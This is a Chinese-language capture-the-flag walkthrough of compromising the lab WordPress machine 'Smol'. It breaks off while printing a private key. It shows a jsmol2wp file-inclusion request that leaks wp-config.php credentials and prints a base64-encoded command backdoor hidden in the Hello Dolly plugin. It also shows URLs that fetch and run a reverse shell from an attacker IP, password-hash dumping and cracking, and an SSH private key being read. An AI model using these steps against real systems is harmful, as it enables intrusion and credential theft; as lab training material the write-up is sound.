captioning * works with\nlocal or remote pdb files from rcsb.org\/pdb = 0.1 pre-alpha = * basic shortcode\nworking with uploaded pdb file * adds .pdb chemical\/pdb mime type to allowed\nmime types * handles multiple shortcodes on the same page<\/code><\/pre>\n
\u7248\u672c\u4e3a1.07<\/code>\uff0c\u8fdb\u884c\u67e5\u8be2<\/p>\n
\"image-20250607105707878\"<\/div><\/p>\n
\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u67e5\u770b\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
{{BaseURL}}\/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php:\/\/filter\/resource=..\/..\/..\/..\/wp-config.php<\/code><\/pre>\n
\u53d1\u73b0\u67e5\u5230\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s "http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php:\/\/filter\/resource=..\/..\/..\/..\/wp-config.php"\n<?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the installation.\n * You don't have to use the web site, you can copy this file to "wp-config.php"\n * and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * Database settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/editing-wp-config-php\/\n *\n * @package WordPress\n *\/\n\n\/\/ ** Database settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine( 'DB_NAME', 'wordpress' );\n\n\/** Database username *\/\ndefine( 'DB_USER', 'wpuser' );\n\n\/** Database password *\/\ndefine( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );\n\n\/** Database hostname *\/\ndefine( 'DB_HOST', 'localhost' );\n\n\/** Database charset to use in creating database tables. *\/\ndefine( 'DB_CHARSET', 'utf8' );\n\n\/** The database collate type. Don't change this if in doubt. *\/\ndefine( 'DB_COLLATE', '' );\n\n\/**#@+\n * Authentication unique keys and salts.\n *\n * Change these to different unique phrases! You can generate these using\n * the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}.\n *\n * You can change these at any point in time to invalidate all existing cookies.\n * This will force all users to have to log in again.\n *\n * @since 2.6.0\n *\/\ndefine( 'AUTH_KEY',         'put your unique phrase here' );\ndefine( 'SECURE_AUTH_KEY',  'put your unique phrase here' );\ndefine( 'LOGGED_IN_KEY',    'put your unique phrase here' );\ndefine( 'NONCE_KEY',        'put your unique phrase here' );\ndefine( 'AUTH_SALT',        'put your unique phrase here' );\ndefine( 'SECURE_AUTH_SALT', 'put your unique phrase here' );\ndefine( 'LOGGED_IN_SALT',   'put your unique phrase here' );\ndefine( 'NONCE_SALT',       'put your unique phrase here' );\n\n\/**#@-*\/\n\n\/**\n * WordPress database table prefix.\n *\n * You can have multiple installations in one database if you give each\n * a unique prefix. Only numbers, letters, and underscores please!\n *\/\n$table_prefix = 'wp_';\n\n\/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\n * For information on other constants that can be used for debugging,\n * visit the documentation.\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/debugging-in-wordpress\/\n *\/\ndefine( 'WP_DEBUG', false );\n\n\/* Add any custom values between this line and the "stop editing" line. *\/\n\n\/* That's all, stop editing! Happy publishing. *\/\n\n\/** Absolute path to the WordPress directory. *\/\nif ( ! defined( 'ABSPATH' ) ) {\n        define( 'ABSPATH', __DIR__ . '\/' );\n}\n\n\/** Sets up WordPress vars and included files. *\/\nrequire_once ABSPATH . 'wp-settings.php';<\/code><\/pre>\n
\u5e76\u5305\u542b\u7528\u6237\u51ed\u8bc1\u7684\u6cc4\u9732\uff1a<\/p>\n
wpuser\nkbLSF2Vop#lw3rjDZ629*Z%G<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u9ed8\u8ba4\u767b\u5f55\u754c\u9762\u4e3ahttp:\/\/www.smol.hmv\/wp-admin<\/code>\uff1a<\/p>\n
\"image-20250607110621178\"<\/div><\/p>\n
\u767b\u5f55\u6210\u529f\uff01\u7136\u540e\u627e\u5230\u4e86\u4e00\u4e9b\u6709\u6548\u4fe1\u606f\uff1a<\/p>\n
# Webmaster Tasks!! \u2014 Private\n\n1- [IMPORTANT] Check Backdoors: Verify the SOURCE CODE of "Hello Dolly" plugin as the site's code revision.\n\n2- Set Up HTTPS: Configure an SSL certificate to enable HTTPS and encrypt data transmission.\n\n3- Update Software: Regularly update your CMS, plugins, and themes to patch vulnerabilities.\n\n4- Strong Passwords: Enforce strong passwords for users and administrators.\n\n5- Input Validation: Validate and sanitize user inputs to prevent attacks like SQL injection and XSS.\n\n6- [IMPORTANT] Firewall Installation: Install a web application firewall (WAF) to filter incoming traffic.\n\n7- Backup Strategy: Set up regular backups of your website and databases.\n\n8- [IMPORTANT] User Permissions: Assign minimum necessary permissions to users based on roles.\n\n9- Content Security Policy: Implement a CSP to control resource loading and prevent malicious scripts.\n\n10- Secure File Uploads: Validate file types, use secure upload directories, and restrict execution permissions.\n\n11- Regular Security Audits: Conduct routine security assessments, vulnerability scans, and penetration tests.<\/code><\/pre>\n
\u663e\u793aHello Dolly<\/code>\u63d2\u4ef6\u4f3c\u4e4e\u5b58\u5728\u4e00\u4e9b\u6f0f\u6d1e\u5229\u7528\uff0c\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n
\"image-20250607111244700\"<\/div>
\n
\"image-20250607111313460\"<\/div><\/p>\n
\u53d1\u73b0\u6587\u4ef6\u540d\u79f0\u4e3ahello.php<\/code>\uff0c\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u67e5\u8be2\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\u7684\u6e90\u7801\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s "http:\/\/www.smol.hmv\/wp-content\/plugins\/jsmol2wp\/php\/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php:\/\/filter\/resource=..\/..\/hello.php" \n<?php\n\/**\n * @package Hello_Dolly\n * @version 1.7.2\n *\/\n\/*\nPlugin Name: Hello Dolly\nPlugin URI: http:\/\/wordpress.org\/plugins\/hello-dolly\/\nDescription: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly<\/cite> in the upper right of your admin screen on every page.\nAuthor: Matt Mullenweg\nVersion: 1.7.2\nAuthor URI: http:\/\/ma.tt\/\n*\/\n\nfunction hello_dolly_get_lyric() {\n        \/** These are the lyrics to Hello Dolly *\/\n        $lyrics = "Hello, Dolly\nWell, hello, Dolly\nIt's so nice to have you back where you belong\nYou're lookin' swell, Dolly\nI can tell, Dolly\nYou're still glowin', you're still crowin'\nYou're still goin' strong\nI feel the room swayin'\nWhile the band's playin'\nOne of our old favorite songs from way back when\nSo, take her wrap, fellas\nDolly, never go away again\nHello, Dolly\nWell, hello, Dolly\nIt's so nice to have you back where you belong\nYou're lookin' swell, Dolly\nI can tell, Dolly\nYou're still glowin', you're still crowin'\nYou're still goin' strong\nI feel the room swayin'\nWhile the band's playin'\nOne of our old favorite songs from way back when\nSo, golly, gee, fellas\nHave a little faith in me, fellas\nDolly, never go away\nPromise, you'll never go away\nDolly'll never go away again";\n\n        \/\/ Here we split it into lines.\n        $lyrics = explode( "\\n", $lyrics );\n\n        \/\/ And then randomly choose a line.\n        return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );\n}\n\n\/\/ This just echoes the chosen line, we'll position it later.\nfunction hello_dolly() {\n        eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));\n\n        $chosen = hello_dolly_get_lyric();\n        $lang   = '';\n        if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {\n                $lang = ' lang="en"';\n        }\n\n        printf(\n                '<p id="dolly"><span class="screen-reader-text">%s <\/span><span dir="ltr"%s>%s<\/span><\/p>',\n                __( 'Quote from Hello Dolly song, by Jerry Herman:' ),\n                $lang,\n                $chosen\n        );\n}\n\n\/\/ Now we set that function up to execute when the admin_notices action is called.\nadd_action( 'admin_notices', 'hello_dolly' );\n\n\/\/ We need some CSS to position the paragraph.\nfunction dolly_css() {\n        echo "\n        <style type='text\/css'>\n        #dolly {\n                float: right;\n                padding: 5px 10px;\n                margin: 0;\n                font-size: 12px;\n                line-height: 1.6666;\n        }\n        .rtl #dolly {\n                float: left;\n        }\n        .block-editor-page #dolly {\n                display: none;\n        }\n        @media screen and (max-width: 782px) {\n                #dolly,\n                .rtl #dolly {\n                        float: none;\n                        padding-left: 0;\n                        padding-right: 0;\n                }\n        }\n        <\/style>\n        ";\n}\n\nadd_action( 'admin_head', 'dolly_css' );<\/code><\/pre>\n
\u89e3\u5bc6\u4e00\u4e0b\u8fd9\u4e2abase64<\/code>\u5b57\u7b26\u4e32\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA" | base64 -d\n\n if (isset($_GET["\\143\\155\\x64"])) { system($_GET["\\143\\x6d\\144"]); }<\/code><\/pre>\n
\u91cc\u5916\u4fe9\u770b\u8d77\u6765\u4e00\u6837\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ printf "\\143\\155\\x64"      \ncmd                                                                                                                                                                                             \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ printf "\\143\\x6d\\144"\ncmd <\/code><\/pre>\n
\u660e\u663e\u662f\u4e00\u4e2a\u540e\u95e8\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\u5f39\u4e00\u4e2ashell\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s "http:\/\/www.smol.hmv\/wp-content\/plugins\/hello.php?cmd=wget+http:\/\/192.168.10.101:8888\/revshell.sh+-O+\/tmp\/revshell.sh" <\/code><\/pre>\n
\u5176\u4ed6\u5e38\u89c1\u7684\u547d\u4ee4\u90fd\u6ca1\u6709\u56de\u663e\uff0c\u4e0d\u5f97\u4e0d\u6000\u7591\u662f\u5426\u53ef\u4ee5\u8fd0\u884c\uff0c\u518d\u7ffb\u7ffb\u5427\uff0c\u53d1\u73b0\u597d\u50cf\u662f\u4e00\u4e2a\u653e\u6b4c\u7684\u63d2\u4ef6\uff0c\u4e14\u6ca1\u5565\u7528\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u7ffb\u7740\u7ffb\u7740\u6211\u627e\u5230\u4e86\u8fd9\u4e2a\u63d2\u4ef6\u7684\u542f\u7528\u4f4d\u7f6e\uff1a<\/p>\n
\"image-20250607140832735\"<\/div><\/p>\n
\u6bcf\u6b21\u5f00\u542f\u540e\u53f0\u4f1a\u663e\u793a\uff0c\u770b\u4e00\u4e0b\u6211\u4eec\u7684\u90a3\u4e2a\u540e\u53f0\u662f\u5426\u5b58\u5728\u8fd9\u4e2a\uff0c\u5982\u679c\u5b58\u5728\u610f\u5473\u7740\u5728\u540e\u53f0\u754c\u9762\u5b58\u5728hello.php<\/code>\u7684\u8c03\u7528\uff0c\u5373\u53ef\u5c1d\u8bd5\u8fdb\u884c\u53cd\u5f39shell\uff1a<\/p>\n
\"image-20250607141011103\"<\/div><\/p>\n
\u627e\u5230\u4e86\uff0c\u516b\u560e\uff01\uff01\uff01\uff01<\/p>\n
\"image-20250607141043009\"<\/div><\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u6267\u884c\u547d\u4ee4\u4ee5\u53ca\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
\"image-20250607141739005\"<\/div><\/p>\n
\u5c1d\u8bd5\u53cd\u5f39\uff0c\u4f46\u662f\u53d1\u73b0\u6267\u884c\u4e0d\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u6587\u4ef6\u8fdb\u884c\u53cd\u5f39\uff1a<\/p>\n
http:\/\/www.smol.hmv\/wp-admin\/index.php?cmd=wget http:\/\/192.168.10.101:8888\/revshell.sh -O \/tmp\/revshell.sh<\/code><\/pre>\n
\"image-20250607142254599\"<\/div><\/p>\n
\u53d1\u73b0\u8bf7\u6c42\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u6267\u884c\uff1a<\/p>\n
http:\/\/www.smol.hmv\/wp-admin\/index.php?cmd=\/bin\/bash%20\/tmp\/revshell.sh<\/code><\/pre>\n
\"image-20250607142413973\"<\/div><\/p>\n
\u5f39\u8fc7\u6765\u4e86\uff01\uff01\uff01\uff01<\/p>\n
\u63d0\u6743<\/h2>\n
\u7a33\u5b9ashell<\/h3>\n
\u8001\u6837\u5b50\u3002\u3002\u3002\u3002<\/p>\n
python3 -c 'import pty;pty.spawn("\/bin\/bash")'\n# script \/dev\/null -c bash\nexport TERM=xterm\nCtrl + Z\nstty raw -echo; fg\n# kali stty size\nstty rows 44 columns 189<\/code><\/pre>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
www-data@smol:\/var\/www\/wordpress\/wp-admin$ cd ~\nwww-data@smol:\/var\/www$ ls -la\ntotal 16\ndrwxr-xr-x  4 root     root     4096 Mar 29  2024 .\ndrwxr-xr-x 13 root     root     4096 Mar 29  2024 ..\ndrwxr-xr-x  2 root     root     4096 Mar 29  2024 html\ndrwxr-x---  5 www-data www-data 4096 Jun  7 02:03 wordpress\nwww-data@smol:\/var\/www$ cd html\nwww-data@smol:\/var\/www\/html$ ls -la\ntotal 24\ndrwxr-xr-x 2 root root  4096 Mar 29  2024 .\ndrwxr-xr-x 4 root root  4096 Mar 29  2024 ..\n-rw-r--r-- 1 root root 10918 Mar 29  2024 index.html.default\n-rw-r--r-- 1 root root   258 Mar 29  2024 index.php\nwww-data@smol:\/var\/www\/html$ cd ..\/wordpress\/\nwww-data@smol:\/var\/www\/wordpress$ ls -la\ntotal 252\ndrwxr-x---  5 www-data www-data  4096 Jun  7 02:03 .\ndrwxr-xr-x  4 root     root      4096 Mar 29  2024 ..\n-rw-r--r--  1 www-data www-data   523 Aug 16  2023 .htaccess\n-rw-r--r--  1 www-data www-data   405 Aug 16  2023 index.php\n-rw-r--r--  1 www-data www-data 19903 Jun  7 02:02 license.txt\n-rw-r--r--  1 www-data www-data  7425 Jun  7 02:02 readme.html\n-rw-r--r--  1 www-data www-data  7387 Jun  7 02:02 wp-activate.php\ndrwxr-xr-x  9 www-data www-data  4096 Aug 16  2023 wp-admin\n-rw-r--r--  1 www-data www-data   351 Aug 16  2023 wp-blog-header.php\n-rw-r--r--  1 www-data www-data  2323 Aug 16  2023 wp-comments-post.php\n-rw-r--r--  1 www-data www-data  3336 Jun  7 02:02 wp-config-sample.php\n-rw-r--r--  1 www-data www-data  3008 Mar 29  2024 wp-config.php\ndrwxr-xr-x  8 www-data www-data  4096 Jun  7 02:03 wp-content\n-rw-r--r--  1 www-data www-data  5617 Jun  7 02:02 wp-cron.php\ndrwxr-xr-x 30 www-data www-data 16384 Jun  7 02:02 wp-includes\n-rw-r--r--  1 www-data www-data  2502 Aug 16  2023 wp-links-opml.php\n-rw-r--r--  1 www-data www-data  3937 Jun  7 02:02 wp-load.php\n-rw-r--r--  1 www-data www-data 51414 Jun  7 02:02 wp-login.php\n-rw-r--r--  1 www-data www-data  8727 Jun  7 02:02 wp-mail.php\n-rw-r--r--  1 www-data www-data 30081 Jun  7 02:02 wp-settings.php\n-rw-r--r--  1 www-data www-data 34516 Jun  7 02:02 wp-signup.php\n-rw-r--r--  1 www-data www-data  5102 Jun  7 02:02 wp-trackback.php\n-rw-r--r--  1 www-data www-data  3205 Jun  7 02:02 xmlrpc.php\nwww-data@smol:\/var\/www\/wordpress$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsshd\nthink\nfwupd-refresh\nxavi\ndiego\ngege\nwww-data@smol:\/var\/www\/wordpress$ ls -la \/home\/\ntotal 24\ndrwxr-xr-x  6 root  root     4096 Aug 16  2023 .\ndrwxr-xr-x 18 root  root     4096 Mar 29  2024 ..\ndrwxr-x---  2 diego internal 4096 Aug 18  2023 diego\ndrwxr-x---  2 gege  internal 4096 Aug 18  2023 gege\ndrwxr-x---  5 think internal 4096 Jan 12  2024 think\ndrwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi<\/code><\/pre>\n
\u6570\u636e\u5e93\u6cc4\u9732<\/h3>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6570\u636e\u5e93\uff1a<\/p>\n
www-data@smol:\/var\/www\/wordpress$ mysql -u wpuser -pkbLSF2Vop#lw3rjDZ629*Z%G\nmysql: [Warning] Using a password on the command line interface can be insecure.\nWelcome to the MySQL monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 524\nServer version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)\n\nCopyright (c) 2000, 2024, Oracle and\/or its affiliates.\n\nOracle is a registered trademark of Oracle Corporation and\/or its\naffiliates. Other names may be trademarks of their respective\nowners.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nmysql> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n| wordpress          |\n+--------------------+\n5 rows in set (0.00 sec)\n\nmysql> use wordpress;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> select * from wp_users;\n+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+\n| ID | user_login | user_pass                                                       | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           |\n+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+\n|  1 | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0                              | admin         | admin@smol.thm     | http:\/\/www.smol.hmv | 2023-08-16 06:58:30 |                     |           0 | admin                  |\n|  2 | wpuser     | $wp$2y$10$r\/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m | wp            | wp@smol.thm        | http:\/\/smol.thm     | 2023-08-16 11:04:07 |                     |           0 | wordpress user         |\n|  3 | think      | $P$B0jO\/cdGOCZhlAJfPSqV2gVi2pb7Vd\/                              | think         | josemlwdf@smol.thm | http:\/\/smol.thm     | 2023-08-16 15:01:02 |                     |           0 | Jose Mario Llado Marti |\n|  4 | gege       | $P$BsIY1w5krnhP3WvURMts0\/M4FwiG0m1                              | gege          | gege@smol.thm      | http:\/\/smol.thm     | 2023-08-17 20:18:50 |                     |           0 | gege                   |\n|  5 | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1                              | diego         | diego@smol.thm     | http:\/\/smol.thm     | 2023-08-17 20:19:15 |                     |           0 | diego                  |\n|  6 | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN\/                              | xavi          | xavi@smol.thm      | http:\/\/smol.thm     | 2023-08-17 20:20:01 |                     |           0 | xavi                   |\n+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+\n6 rows in set (0.00 sec)\n\nmysql> select user_nicename,user_login,user_pass from wp_users;\n+---------------+------------+-----------------------------------------------------------------+\n| user_nicename | user_login | user_pass                                                       |\n+---------------+------------+-----------------------------------------------------------------+\n| admin         | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0                              |\n| wp            | wpuser     | $wp$2y$10$r\/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m |\n| think         | think      | $P$B0jO\/cdGOCZhlAJfPSqV2gVi2pb7Vd\/                              |\n| gege          | gege       | $P$BsIY1w5krnhP3WvURMts0\/M4FwiG0m1                              |\n| diego         | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1                              |\n| xavi          | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN\/                              |\n+---------------+------------+-----------------------------------------------------------------+\n6 rows in set (0.00 sec)<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
admin:$P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0\nwpuser:$wp$2y$10$r\/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m\nthink:$P$B0jO\/cdGOCZhlAJfPSqV2gVi2pb7Vd\/\ngege:$P$BsIY1w5krnhP3WvURMts0\/M4FwiG0m1\ndiego:$P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1\nxavi:$P$BvcalhsCfVILp2SgttADny40mqJZCN\/<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash     \nUsing default input encoding: UTF-8\nLoaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 128\/128 SSE2 4x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nsandiegocalifornia (diego)     \n1g 0:00:43:32 42.46% (ETA: 04:19:56) 0.000382g\/s 2372p\/s 9992c\/s 9992C\/s lilmami503..lilmama_c\nUse the "--show --format=phpass" options to display all of the cracked passwords reliably\nSession aborted<\/code><\/pre>\n
\u7834\u89e3\u5373\u53ef\u62ff\u5230\u5bc6\u7801\uff1adiego:sandiegocalifornia <\/code>\uff0c\u5c3d\u7ba1\u5f00\u542f\u4e86ssh\u670d\u52a1\uff0c\u4f46\u662f\u7981\u6b62\u767b\u5f55\u3002\u3002\u3002\u3002<\/p>\n
\"image-20250607144723756\"<\/div><\/p>\n
\u76f8\u540c\u7ec4\u6743\u9650\u8bfb\u53d6\u51ed\u8bc1\u5207\u6362\u7528\u6237<\/h3>\n
diego@smol:~$ ls -la\ntotal 24\ndrwxr-x--- 2 diego internal 4096 Aug 18  2023 .\ndrwxr-xr-x 6 root  root     4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root  root        9 Aug 18  2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 diego diego     220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 diego diego    3771 Feb 25  2020 .bashrc\n-rw-r--r-- 1 diego diego     807 Feb 25  2020 .profile\n-rw-r--r-- 1 root  root       33 Aug 16  2023 user.txt\nlrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> \/dev\/null\ndiego@smol:~$ cat user.txt \n45edaec653ff9ee06236b7ce72b86963\ndiego@smol:~$ sudo -l\n[sudo] password for diego: \nSorry, user diego may not run sudo on smol.\ndiego@smol:~$ whoami;id\ndiego\nuid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)\ndiego@smol:~$ ls -la ..\/\ntotal 24\ndrwxr-xr-x  6 root  root     4096 Aug 16  2023 .\ndrwxr-xr-x 18 root  root     4096 Mar 29  2024 ..\ndrwxr-x---  2 diego internal 4096 Aug 18  2023 diego\ndrwxr-x---  2 gege  internal 4096 Aug 18  2023 gege\ndrwxr-x---  5 think internal 4096 Jan 12  2024 think\ndrwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi<\/code><\/pre>\n
\u4e4b\u524d\u6ce8\u610f\u5230\u56db\u4e2a\u76f8\u540c\u7ec4\u6743\u9650\u7684\u7528\u6237\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u6ca1\u6709\u6709\u6548\u4fe1\u606f\uff1a<\/p>\n
diego@smol:~$ cd ..\/gege\ndiego@smol:\/home\/gege$ ls -la\ntotal 31532\ndrwxr-x--- 2 gege internal     4096 Aug 18  2023 .\ndrwxr-xr-x 6 root root         4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc\n-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile\nlrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> \/dev\/null\n-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip\ndiego@smol:\/home\/gege$ cd ..\/think\ndiego@smol:\/home\/think$ ls -la\ntotal 32\ndrwxr-x--- 5 think internal 4096 Jan 12  2024 .\ndrwxr-xr-x 6 root  root     4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout\n-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc\ndrwx------ 2 think think    4096 Jan 12  2024 .cache\ndrwx------ 3 think think    4096 Aug 18  2023 .gnupg\n-rw-r--r-- 1 think think     807 Jun  2  2023 .profile\ndrwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh\nlrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> \/dev\/null\ndiego@smol:\/home\/think$ cd .ssh\ndiego@smol:\/home\/think\/.ssh$ ls -la\ntotal 20\ndrwxr-xr-x 2 think think    4096 Jun 21  2023 .\ndrwxr-x--- 5 think internal 4096 Jan 12  2024 ..\n-rwxr-xr-x 1 think think     572 Jun 21  2023 authorized_keys\n-rwxr-xr-x 1 think think    2602 Jun 21  2023 id_rsa\n-rwxr-xr-x 1 think think     572 Jun 21  2023 id_rsa.pub\ndiego@smol:\/home\/think\/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxGtoQjY5NUymuD+3b0xzEYIhdBbsnicrrnvkMjOgdbp8xYKrfOgM\nehrkrEXjcqmrFvZzp0hnVnbaCyUV8vDrywsrEivK7d5IDefssH\/RqRinOY3FEYE+ekzKoH\n+S6+jNEKedMH7DamLsXxsAG5b\/Avm+FpWmvN1yS5sTeCeYU0wsHMP+cfM1cYcDkDU6HmiC\nA2G4D5+uPluSH13TS12JpFyU3EjHQvV6evERecriHSfV0PxMrrwJEyOwSPYA2c7RlYh+tb\nbniQRVAGE0Jato7kqAJOKZIuXHEIKhBnFOIt5J5sp6l\/QfXxZYRMBaiuyNttOY1byNwj6\/\nEEyQe1YM5chhtmJm\/RWog8U6DZf8BgB2KoVN7k11VG74+cmFMbGP6xn1mQG6i2u3H6WcY1\nLAc0J1bhypGsPPcE06934s9jrKiN9Xk9BG7HCnDhY2A6bC6biE4UqfU3ikNQZMXwCvF8vY\nHD4zdOgaUM8Pqi90WCGEcGPtTfW\/dPe4+XoqZmcVAAAFiK47j+auO4\/mAAAAB3NzaC1yc2\nEAAAGBAMRraEI2OTVMprg\/t29McxGCIXQW7J4nK6575DIzoHW6fMWCq3zoDHoa5KxF43Kp\nqxb2c6dIZ1Z22gslFfLw68sLKxIryu3eSA3n7LB\/0akYpzmNxRGBPnpMyqB\/kuvozRCnnT\nB+w2pi7F8bABuW\/wL5vhaVprzdckubE3gnmFNMLBzD\/nHzNXGHA5A1Oh5oggNhuA+frj5b\nkh9d00tdiaRclNxIx0L1enrxEXnK4h0n1dD8TK68CRMjsEj2ANnO0ZWIfrW254kEVQBhNC\nWraO5KgCTimSLlxxCCoQZxTiLeSebKepf0H18WWETAWorsjbbTmNW8jcI+vxBMkHtWDOXI\nYbZiZv0VqIPFOg2X\/AYAdiqFTe5NdVRu+PnJhTGxj+sZ9ZkBuotrtx+lnGNSwHNCdW4cqR\nrDz3BNOvd+LPY6yojfV5PQRuxwpw4WNgOmwum4hOFKn1N4pDUGTF8ArxfL2Bw+M3ToGlDP\nD6ovdFghhHBj7U31v3T3uPl6KmZnFQAAAAMBAAEAAAGBAIxuXnQ4YF6DFw\/UPkoM1phF+b\nUOTs4kI070tQpPbwG8+0gbTJBZN9J1N9kTfrKULAaW3clUMs3W273sHe074tmgeoLbXJME\nwW9vygHG4ReM0MKNYcBKL2kxTg3CKEESiMrHi9MITp7ZazX0D\/ep1VlDRWzQQg32Jal4jk\nrxxC6J32ARoPHHeQZaCWopJAxpm8rfKsHA4MsknSxf4JmZnrcsmiGExzJQX+lWQbBaJZ\/C\nw1RPjmO\/fJ16fqcreyA+hMeAS0Vd6rUqRkZcY\/0\/aA3zGUgXaaeiKtscjKJqeXZ66\/NiYD\n6XhW\/O3\/uBwepTV\/ckwzdDYD3v23YuJp1wUOPG\/7iTYdQXP1FSHYQMd\/C+37gyURlZJqZg\ne8ShcdgU4htakbSA8K2pYwaSnpxsp\/LHk9adQi4bB0i8bCTX8HQqzU8zgaO9ewjLpGBwf4\nY0qNNo8wyT